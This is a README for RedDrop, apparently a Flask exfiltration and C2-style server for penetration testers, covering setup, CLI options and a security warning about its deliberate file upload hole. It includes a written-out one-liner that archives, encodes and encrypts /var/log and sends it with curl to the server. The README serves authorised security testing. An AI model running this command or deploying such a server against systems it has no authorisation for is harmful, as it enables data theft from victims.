RedDrop is a quick and easy web server for capturing and processing encoded and encrypted payloads and tar archives.


Red Drop

RedDrop Exfil Server

Check out the accompanying MaverisLabs Blog Post Here!

RedDrop Exfil Server is a Python Flask Web Server for Penetration Testers, Red Teamers, and Security Professionals which features:

This software is intended to be used as an a rudementary C2 endpoint for capturing web request data in various scenarios. Some examples may include:

  • A blind command injection vulnerability
  • An XSS attack where a quick and dynamic web request logging server is needed
  • A situation where remote shell access has been obtained and a verbose-logging web-based exfiltration server is desired



This project is still in development and some features may be buggy. If you run into problems, please open an Issue!

A note on security

This software should not be left generally accessible to the broader Internet. It is built with what some might consider an Arbitrary File Upload vulnerability by intention, and will accept and save files to the local disk without authentication. Due diligence should be taken to ensure that the system this software is deployed to is secured properly. A few recommendations:

  • Utilize the Authorization Rules feature of RedDrop to drop requests which do not meet your criteria.
  • Place a Reverse Proxy to route and block traffic to this web application
  • Whitelist your target's IP space
  • Don't auto extract archives without understanding my filtering method

Quick Start


mkdir uploads logs
docker run --rm -t -v "$PWD/uploads:/reddrop/uploads" -v "$PWD/logs:/reddrop/logs" -p "80:80" --name reddrop cyberbutler/reddrop -h


pip install --user pipenv
pipenv install
pipenv shell
python -h


python -h

     A Webserver for File and Data Exfiltration.
        Author: @cyberbutler/@thecyberbutler

optional arguments:
  -h, --help            show this help message and exit
  --host HOST, -H HOST  The host IP Address to bind to (default:
  --port PORT, -P PORT  The port to bind to (default: 80)
  -c CONFIG, --config CONFIG
                        YAML config file path (default: None)
  --dump-config         Dump the configuration settings as YAML
                        (default: False)
  --debug               Enable Flask's Debug Mode (default: False)
  -p {hex,openssl-aes256-pbkdf2,gzip,b64}, --processor {hex,openssl-aes256-pbkdf2,gzip,b64}
                        Specify a processor to use. This flag can
                        be used more than once to define multiple
                        process_list functions. Use this flag in
                        the order in which you wish to process
                        received data (default: [])
  -A, --auto-process, --no-auto-process
                        Automatically run processors based on
                        detected data. This option is enabled by
                        default, but should be disabled (--no-
                        auto-process) when you receive output you
                        don't expect. Such as in the case of
                        Base64 decoding being run on output that
                        is not Base64 encoded. Instead, force the
                        process with the `-p` flag. (default:
  --auto-extract-tar, -x
                        Auto extract TAR archives received by the
                        server. (default: False)
                        The password used to decrypt/encrypt.
                        (default: EncryptMe)
                        Specify an Authorization Rule to deny
                        requests which do not match the provided
                        Key and Regex value pair. Specified as
                        <Key>=<Regex>. (default: None)
  -t TAGS, --tag TAGS   Tag data received during this session in the logs as well as the directory files are uploaded to. Example:
                        -t log4j -t (default: None)
  --tls-keyfile GUNICORN.KEYFILE
                        Enables TLS Support. (Production Only) The path to a TLS key file (default: None)
  --tls-certfile GUNICORN.CERTFILE
                        Enables TLS Support. (Production Only) The path to a TLS cert file (default: None)

Far more configuration options exist which must be specified in Environment Variables, use `--dump-config` to see all of the options


Exfiltrating a Tar archive and command output from a Linux system

tar cz /var/log | base64 | xxd -ps | gzip | openssl enc -aes-256-cbc -pass 'pass:EncryptMe' -e -a -pbkdf2 | curl$PWD -F 'logs=@-' -F "listing=`ls -al * | gzip | base64`"



  • Greater documentation of techniques using this web server
  • Chunked File Upload handling and example commands
  • More Processing modules
  • Expand archive extraction functionality
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